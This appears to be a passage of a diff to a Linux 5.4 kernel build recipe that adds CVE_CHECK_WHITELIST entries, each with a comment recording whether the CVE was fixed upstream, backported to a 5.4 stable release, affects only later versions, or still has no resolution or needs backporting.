+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19039"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2019-19043"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19044"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19045"
+
+# cpe-stable-backport: Backported in 5.4.15
+CVE_CHECK_WHITELIST += "CVE-2019-19046"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19047"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19048"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19049"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19050"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19051"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19052"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19053"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-19054"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19055"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19056"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19057"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19058"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19059"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19060"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19061"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19062"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19063"
+
+# cpe-stable-backport: Backported in 5.4.13
+CVE_CHECK_WHITELIST += "CVE-2019-19064"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19065"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19066"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19067"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19068"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19069"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19070"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19071"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19072"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19073"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19074"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19075"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19076"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19077"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19078"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-19079"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19080"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19081"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19082"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19083"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19227"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2019-19241"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19252"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19318"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19319"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19332"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19338"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19377"
+
+# CVE-2019-19378 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2019-19447"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2019-19448"
+
+# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2019-19462"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19523"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-19524"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19525"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19526"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19527"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19528"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19529"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19530"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19531"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19532"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19533"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19534"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19535"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19536"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19537"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19543"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19602"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19767"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2019-19768"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2019-19769"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2019-19770"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19807"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19813"
+
+# CVE-2019-19814 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19922"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19927"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19947"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-19965"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19966"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-1999"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20054"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20095"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-20096"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2024"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2019-2025"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20422"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2054"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-20636"
+
+# CVE-2019-20794 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20806"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2019-20810"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20811"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-20812"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20908"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-20934"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2101"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2181"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2019-2182"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-2213"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-2214"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2215"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-25044"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-25045"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-25160"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2019-25162"
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2019-3016"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3459"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3460"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-3701"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3819"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3837"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3846"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3874"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3882"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3887"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3892"
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3896"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3900"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3901"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-5108"
+
+# Skipping CVE-2019-5489, no affected_versions
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-6133"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-6974"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7221"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7222"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-7308"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-8912"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-8956"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-8980"
+
+# fixed-version: Fixed after version 5.0rc4
+CVE_CHECK_WHITELIST += "CVE-2019-9003"
+
+# fixed-version: Fixed after version 5.0rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9162"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-9213"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9245"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9444"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9445"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9453"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2019-9454"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9455"
+
+# fixed-version: Fixed after version 4.16rc6
+CVE_CHECK_WHITELIST += "CVE-2019-9456"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9457"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9458"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9466"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9500"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9503"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-9506"
+
+# fixed-version: Fixed after version 5.1rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9857"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0009"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2020-0030"
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2020-0041"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2020-0066"
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-0067"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0110"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-0255"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0305"
+
+# CVE-2020-0347 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2020-0404"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-0423"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2020-0427"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-0429"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0430"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0431"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-0432"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0433"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0435"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-0444"
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2020-0465"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-0466"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-0543"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-10135"
+
+# cpe-stable-backport: Backported in 5.4.8
+CVE_CHECK_WHITELIST += "CVE-2020-10690"
+
+# CVE-2020-10708 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-10711"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10720"
+
+# cpe-stable-backport: Backported in 5.4.44
+CVE_CHECK_WHITELIST += "CVE-2020-10732"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2020-10742"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-10751"
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2020-10757"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10766"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10767"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10768"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10769"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2020-10773"
+
+# CVE-2020-10774 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-10781"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-10942"
+
+# cpe-stable-backport: Backported in 5.4.32
+CVE_CHECK_WHITELIST += "CVE-2020-11494"
+
+# cpe-stable-backport: Backported in 5.4.31
+CVE_CHECK_WHITELIST += "CVE-2020-11565"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11608"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11609"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11668"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-11669"
+
+# CVE-2020-11725 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-11884"
+
+# CVE-2020-11935 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2020-12114"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12351"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12352"
+
+# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-12464"
+
+# cpe-stable-backport: Backported in 5.4.26
+CVE_CHECK_WHITELIST += "CVE-2020-12465"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2020-12652"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12653"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12654"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-12655"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-12656"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12657"
+
+# cpe-stable-backport: Backported in 5.4.35
+CVE_CHECK_WHITELIST += "CVE-2020-12659"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2020-12768"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-12769"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-12770"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-12771"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12826"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-12888"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-12912"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-13143"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-13974"
+
+# CVE-2020-14304 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2020-14305"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-14314"
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-14331"
+
+# cpe-stable-backport: Backported in 5.4.78
+CVE_CHECK_WHITELIST += "CVE-2020-14351"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2020-14353"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-14356"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2020-14381"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14385"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14386"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-14390"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-14416"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-15393"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-15436"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-15437"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-15780"
+
+# CVE-2020-15802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-15852"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2020-16119"
+
+# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.57
+CVE_CHECK_WHITELIST += "CVE-2020-16166"
+
+# cpe-stable-backport: Backported in 5.4.5
+CVE_CHECK_WHITELIST += "CVE-2020-1749"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-24394"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-24490"
+
+# CVE-2020-24502 has no known resolution
+
+# CVE-2020-24503 has no known resolution
+
+# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24586"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24587"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24588"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2020-25211"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2020-25212"
+
+# CVE-2020-25220 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-25221"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-25284"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25285"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2020-25639"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25641"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25643"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25645"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25656"
+
+# CVE-2020-25661 has no known resolution
+
+# CVE-2020-25662 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25668"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-25669"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25670"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25671"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25672"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25673"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-25704"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-25705"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2020-26088"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26139"
+
+# CVE-2020-26140 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26141"
+
+# CVE-2020-26142 has no known resolution
+
+# CVE-2020-26143 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26147"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2020-26541"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26555"
+
+# CVE-2020-26556 has no known resolution
+
+# CVE-2020-26557 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26558"
+
+# CVE-2020-26559 has no known resolution
+
+# CVE-2020-26560 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-27066"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-27067"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-27068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27152"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27170"
+
+# fixed-version: only affects 5.10rc1 onwards
